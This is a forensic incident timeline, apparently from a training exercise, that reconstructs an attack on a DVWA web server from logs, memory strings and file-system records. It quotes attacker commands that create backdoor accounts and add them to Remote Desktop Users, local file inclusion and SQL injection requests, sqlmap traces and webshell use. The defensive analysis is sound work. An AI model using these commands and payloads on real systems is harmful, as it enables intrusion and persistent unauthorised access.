9/2/2015 9:04:35HTTP POSTS to /dvwa/vulnerabilities/execaccess.logTime correlation to creation of user1 && hacker accounts. Hypothesis - attacker used command injection vulnerability to create these accounts
(assumed proximity BEFORE account creation)net user user1 Root@psut /addMemory stringsRun via apparent command injection vuln
(assumed proximity BEFORE account creation)net localgroup "Remote Desktop Users" user1 /addMemory (found with Vol "consoles" plugin)Run via apparent command injection vuln
9/2/2015 9:05:06user1 account createdSAM hiveInitial pivot
(assumed proximity BEFORE account creation)net user hacker hacker /add Memory stringsRun via apparent command injection vuln
(assumed proximity BEFORE account creation)net localgroup "Remote Desktop Users" hacker /addMemory stringsRun via apparent command injection vuln
9/2/2015 9:05:25hacker account createdSAM hiveInitial pivot
9/2/2015 9:31:16First LFI activity observed - accessing hosts fileaccess.logHypothesis - attacker accessed hosts file to confirm they have LFI access
9/2/2015 9:33:23"GET /dvwa/vulnerabilities/fi/?page=../../../../../../users/administrator/data.txt HTTP/1.1" 200access.logAttacker accesses data.txt which simply says "hello" inside. Hypothesis - attacker created this file with command injection vuln, and accessed it via LFI to verify file write capability and access via LFI.
9/2/2015 9:34:52LFI activity observed accessing phpmyadmin configuration.php_error_log && access.logPHP Warning: include(../../../../../../xampp/phpmyadmin/config.inc): failed to open stream: No such file or directory in C:\xampp\htdocs\DVWA\vulnerabilities\fi\index.php on line 35
9/2/2015 9:42:11"POST /dvwa/vulnerabilities/exec/ HTTP/1.1" 200 4951 "http://192.168.56.101/dvwa/vulnerabilities/exec/"access.logHypothesis - attacker wrote abc.txt using command injection vuln.
9/2/2015 9:42:21"GET /dvwa/vulnerabilities/fi/?page=../../../../../../../../abc.txt HTTP/1.1" 200access.logHypothesis - attacker used abc.txt
9/2/2015 10:49:53"GET /dvwa/vulnerabilities/sqli/?id=a%27+or+1%3D1&Submit=Submit HTTP/1.1" 200 159 "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"access.logSQLi activitry
9/2/2015 11:15:40"GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 302 1 "-" "sqlmap/1.0-dev-nongit-20150902 (http://sqlmap.org)"access.logSQLmap attack tool run by attacker, evidenced by UA string and accompanying SQLi attempts.
9/2/2015 11:25:53tmpbiwuc.php created timeMFTPotential malicious PHP webshell
9/2/2015 11:25:52tmpukudk.php created timeMFTPotential malicious PHP webshell
9/2/2015 11:25:53"GET /tmpbiwuc.php?cmd=echo%20command%20execution%20test HTTP/1.1"access.logCommand execution test of droppecd tmpbiwuc.php file which was dropped by SQLmap.
9/3/2015 7:14:48\xampp\htdocs\DVWA\webshells.zip createdMFTPHP webshells - C99 and a simple 1 liner PHP command shell
9/3/2015 7:16:03phpshell.php accessedphp_error_log
9/3/2015 7:19:32c99.php accessedphp_error_log
9/3/2015 7:21:28c99 shell used to execute 4 commandsaccess.logShows attacker persistence using Webshell.